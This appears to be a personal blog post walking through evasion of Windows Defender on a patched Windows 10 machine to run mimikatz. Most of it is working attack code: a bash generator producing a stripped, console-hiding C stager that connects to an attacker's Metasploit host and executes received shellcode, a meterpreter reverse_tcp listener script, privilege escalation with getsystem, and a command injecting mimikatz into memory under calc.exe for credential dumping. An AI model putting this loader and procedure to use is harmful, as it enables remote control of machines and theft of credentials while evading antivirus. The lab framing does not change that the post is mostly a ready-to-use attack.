I have been keeping this journal for 7 years now and I guess this is a reason to add some interesting stuff (lately I have been busy in the compiler world on various architectures and different developer boards)
Here is a short little exercise for this evening -> getting the latest mimikatz running on a Windows 10 machine (build 10.0.16299.192) with all latest updates and Windows Defender protecting.
Microsoft has gotten really good in detecting all sorts of techniques and even a good custom ps1 mimikatz script that I have used a lot in the past gets flagged now
This customized method does not work anymore https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/
So I have played a little with my other generator scripts and came up with the following which is always reliable, all that I had to do is make it produce 64bit PE32+ executable and load the listener for 64bit reverse shell.
Here are my scripts and steps : (make sure you have the mingw-w64 )
ii binutils-mingw-w64-x86-64 2.26-3ubuntu1+6.6 amd64 Cross-binutils for Win64 (x64) using MinGW-w64
ii g++-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C++ compiler for MinGW-w64 targeting Win64
ii gcc-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C compiler for MinGW-w64 targeting Win64
ii mingw-w64-x86-64-dev 4.0.4-2 all Development files for MinGW-w64 targeting Win64
#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port
echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo ' WSADATA wsaData;' >> temp.c
echo ' WORD wVersionRequested;' >> temp.c
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo ' printf("bad\n"); '>> temp.c
echo ' WSACleanup(); '>> temp.c
echo ' exit(1);'>> temp.c
echo ' }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo ' printf("r %s\n", error);'>> temp.c
echo ' closesocket(my_socket);'>> temp.c
echo ' WSACleanup();'>> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo ' int tret = 0;'>> temp.c
echo ' int nret = 0;'>>temp.c
echo ' void * startb = buffer;'>> temp.c
echo ' while (tret < len) {'>>temp.c
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo ' startb += nret;'>> temp.c
echo ' tret += nret;'>>temp.c
echo ' if (nret == SOCKET_ERROR)'>> temp.c
echo ' punt(my_socket, "no data");'>> temp.c
echo ' }'>>temp.c
echo ' return tret;'>> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo ' struct hostent * target;' >> temp.c
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c
echo ' punt(my_socket, ".");'>>temp.c
echo ' target = gethostbyname(targetip);'>>temp.c
echo ' if (target == NULL)'>>temp.c
echo ' punt(my_socket, "..");'>>temp.c
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo ' sock.sin_family = AF_INET;'>> temp.c
echo ' sock.sin_port = htons(port);'>>temp.c
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo ' punt(my_socket, "...");'>>temp.c
echo ' return my_socket;'>>temp.c
echo '}' >> temp.c
echo 'int main(int argc, char * argv[]) {' >> temp.c
echo ' FreeConsole();'>>temp.c
echo ' Sleep(10);'>>temp.c
echo ' ULONG32 size;'>>temp.c
echo ' char * buffer;'>>temp.c
echo ' void (*function)();'>>temp.c
echo ' winsock_init();'>> temp.c
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c
echo ' if (count != 4 || size <= 0)'>>temp.c
echo ' punt(my_socket, "error lenght\n");'>>temp.c
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c
echo ' if (buffer == NULL)'>>temp.c
echo ' punt(my_socket, "error in buf\n");'>>temp.c
echo ' buffer[0] = 0xBF;'>>temp.c
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c
echo ' function = (void (*)())buffer;'>>temp.c
echo ' function();'>>temp.c
echo ' return 0;'>>temp.c
echo '}' >> temp.c
echo '(+) Compiling binary ..'
x86_64-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows
ls -la temp.c
strip payload.exe
file=`ls -la payload.exe` ; echo '(+)' $file
This will generate a loader called payload.exe which you can execute on the Windows 10 lab machine (I have used runs admin to be able to inject latest 64bit mimikatz.exe to memory from the spawned reverse shell)
My listener on the attacking machine running Metasploit is as follows:
#!/bin/bash clear echo "***************************************************************" echo " X86-64 meterpreter reverse tcp listener loader " echo "***************************************************************" echo -e "What IP are we gonna listen to ? \c" read host echo -e "What Port Number are we gonna listen to? : \c" read port echo "Starting the meterpreter listener.." echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh echo -n $host >> run.listener.sh echo -n '; set LPORT ' >> run.listener.sh echo -n $port >> run.listener.sh echo -n '; run"' >> run.listener.sh chmod +x run.listener.sh ./run.listener.sh
So run the above script from your metasploit directory and execute the payload.exe on the test machine.
Once you get the reverse shell connected
Run getsystem to elevate to NT AUTHORITY/SYSTEM and execute latest 64bit mimikatz.exe
Mimikatz 2.1.1-20180127 https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180127
Download, extract and copy over the x64/mimikatz.exe to your metasploit root directory, then execute it via the following command
meterpreter > execute -H -i -c -f /home/user/metasploit-framework/mimikatz.exe -m -d calc.exe
You get the latest mimikatz running with all the new interesting features added … DCShadow ….
Of course we can have some fun with DPAPI stuff in windows ( as described here https://github.com/gentilkiwi/mimikatz/wiki/howto-~-scheduled-tasks-credentials )
